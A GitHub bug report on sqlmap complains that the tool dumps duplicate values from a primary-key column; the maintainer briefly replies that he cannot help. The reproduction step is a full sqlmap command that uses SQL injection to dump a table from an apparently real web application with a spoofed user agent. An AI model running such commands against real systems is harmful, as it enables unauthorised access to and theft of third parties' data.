### ISSUE TITLE
SQLMAP dumps duplicate data

### ISSUE THREAD

**Issue by sharifulgeo** [sqlmapproject/sqlmap#5290]
**Describe the bug**
Sqlmap dumps row values of a column of a table that contains so many duplicates though that values must be unique.

**To Reproduce**
sqlmap.py -u "http://116.68.YYY.XXX/TradeLicense/rpt_TradeLicense_print_ver2.aspx?id=9734a3df-2b93-4d8c-9ad3-f1026b1a6635&transactionno=126395476" --risk=3 -p "id" -C "RowId" -T TL_GenerateTradeLicense -D brd_south --level=5 --threads=10 --output-dir="./" --parse-errors -t "traffic.txt" -o -s "./session.sqlite" -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 9.50"  --where="substring(convert(varchar, [Created_on], 112),1,6) = '202204'" --force-pivoting  --pivot-column="RowId"   -dump --dump-file="./AllTRD_ID_Apr_2022.csv"

**Expected behavior**
It should dump unique values of RowId column of TL_GenerateTradeLicense table. Duplicates are identified in Microsoft Excel as shown in the screenshot.RowId is the primary key of the table.

**Screenshots**
![Untitled](https://user-images.githubusercontent.com/2772109/212523903-3fbbb8ed-190c-48e5-a648-f2b1ea54b894.png)

**Running environment:**
 - sqlmap version [{1.7.1.4#dev}]
 - Installation method [git]
 - Operating system: [Microsoft Windows 10]
 - Python version [3.11.1]

**Target details:**
 - DBMS [Microsoft SQL Server]
 - SQLi techniques found by sqlmap [error-based and boolean-based blind]
 - WAF/IPS [if any]
 - Relevant console output [if any]
 - Exception traceback [if any]

**Additional context**
If I run sqlmap in another pc then sqlmap seems to work perfectly.
![Untitled1](https://user-images.githubusercontent.com/2772109/212523898-6b6487ea-7345-4c0a-978a-b354f59e94a8.png)

**Comment by stamparm** [comment]
really not sure how to help you here. i miss anything useful
